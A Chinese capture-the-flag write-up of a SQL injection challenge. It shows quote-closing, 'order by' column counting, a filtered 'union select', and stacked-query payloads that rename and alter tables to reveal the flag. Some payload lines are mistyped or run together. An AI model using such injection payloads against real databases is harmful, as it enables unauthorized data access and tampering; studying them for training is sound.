题目:
由题目信息可得出,采用SQL注入;
首先判断闭合符号,输入1’ 发现报错了,用**#**截断
那么存在注入漏洞,接下来查询字段数,**1’ order by 3#**发现报错了
**1’ order by 2#**则显示正常,那么字段数为两个;
联合查询:1’ union select 1,2#
select,update,…都被过滤掉了;
堆叠注入:又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句。
我们继续查询数据库:1’;show databases;#
接下来查询字段
此时发现存在‘1919810931114514’和‘words’这两个字段。
查询这两个字段中的列名:
1’; show columns form ‘words’
1’; show columns form
1919810931114514
这里要注意使用反引号。
发现words里边存在id 和data,flag则在1919810931114514里边,但没法显示出来;(我们要的东西都在words中回显出来了)即我们若想得到flag,就需要:
(1)将字段words换为其他的,如word1
(2)将字段1919810931114514换为words
(3)将列名flag换为id
需要使用alter,rename等关键字, 如下:
1’ ; rename tables
wordstoword1; rename tables1919810931114514towords; alter tablewordschangeflagidvarchar(100);#
这样就改变了数据库结构,
1’ or 1=1#
得到flag{37c18514-62c1-4d17-b3e9-72e9876d7d6f}
本题涉及了rename , alter ,这两个关键字:
rename:重命名
alter:变更列
对数据库结构改变的简单语句:
CREATE DATABASE - 创建新数据库
ALTER DATABASE - 修改数据库
CREATE TABLE - 创建新表
ALTER TABLE - 变更(改变)数据库表
DROP TABLE - 删除表
CREATE INDEX - 创建索引(搜索键)
DROP INDEX - 删除索引
